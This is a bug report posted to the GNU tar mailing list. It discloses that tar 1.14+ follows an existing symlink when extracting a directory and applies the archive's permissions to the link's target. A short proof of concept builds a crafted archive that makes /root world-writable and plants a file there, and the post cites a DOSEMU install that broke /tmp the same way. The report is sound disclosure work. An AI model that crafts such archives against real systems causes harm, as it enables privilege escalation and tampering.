Hi, I just discovered that tar 1.14 enabled the opposite of "--no-overwrite-dir" by default. This is an unexpected and subtle change in behavior.
Users of tar who are unaware of this change are subject to the following exploit: The hacker constructs "dir.tar" and sends it to the unsuspecting user. ~~~~ # mkdir dir # >dir/YOU_HAVE_BEEN_HACKED.txt # chmod a+rwx dir # tar cf dir.tar dir # rm -rf dir ~~~~ The user happens to have a symlink called "dir" in the current directory and untars "dir.tar": ~~~~ # tar --version tar (GNU tar) 1.15.1 # ls -ld /root drwx------ 25 root root 1784 Sep 3 23:00 /root # ls -l /root/*.txt ls: /root/*.txt: No such file or directory # ln -s /root dir # (simulate already existing symlink) # tar xf dir.tar # ls -ld /root drwxrwxrwx 25 root root 1824 Sep 3 23:02 /root # ls -l /root/*.txt -rw-r--r-- 1 root root 0 Sep 3 23:02 /root/YOU_HAVE_BEEN_HACKED.txt # ls -ld dir lrwxrwxrwx 1 root root 5 Sep 3 23:06 dir -> /root ~~~~ An older version of tar gives the expected - and safer - behaviour: ~~~~ # tar --version tar (GNU tar) 1.13.25 [...] # ls -ld /root drwx------ 25 root root 1784 Sep 3 23:00 /root # ls -l /root/*.txt ls: /root/*.txt: No such file or directory # ln -s /root dir # (simulate already existing symlink) # tar xf dir.tar # ls -ld /root drwx------ 21 root root 2144 Sep 3 22:35 /root/ # ls -l /root/*.txt ls: /root/*.txt: No such file or directory # ls -ld dir drwxrwxrwx 2 root root 88 Sep 3 23:02 dir/ ~~~~ In-the-wild "exploit": Typing "make install" as root for the second time with DOSEMU 1.3.2 or CVS source (prior to a few minutes ago) will change the permissions of "/tmp" from "rwxrwxrwt" to "rwxr-xr-x", creating a DoS for non-root users. https://sourceforge.net/tracker/?func=detail&atid=457447&aid=1224934&group_id=49784 The reason for this is that at "make install" time, a symbolic link "/usr/local/share/dosemu/freedos/tmp" is made to point to "/tmp". On the second invocation of "make install", dosemu-freedos-bin.tgz is unpacked to "/usr/local/share" - however it contains a directory "dosemu/freedos/tmp" with permissions "rwxr-xr-x". Suggested fix: Revert relevant behaviour to tar 1.13.25. As DOSEMU has shown, it is too dangerous to change this kind of behaviour and expect users to realise that such a change has occured. Imagine changing "rm -i" to delete files without prompting! Clarence [please CC me on replies] _______________________________________________ Bug-tar mailing list [email protected] http://lists.gnu.org/mailman/listinfo/bug-tar
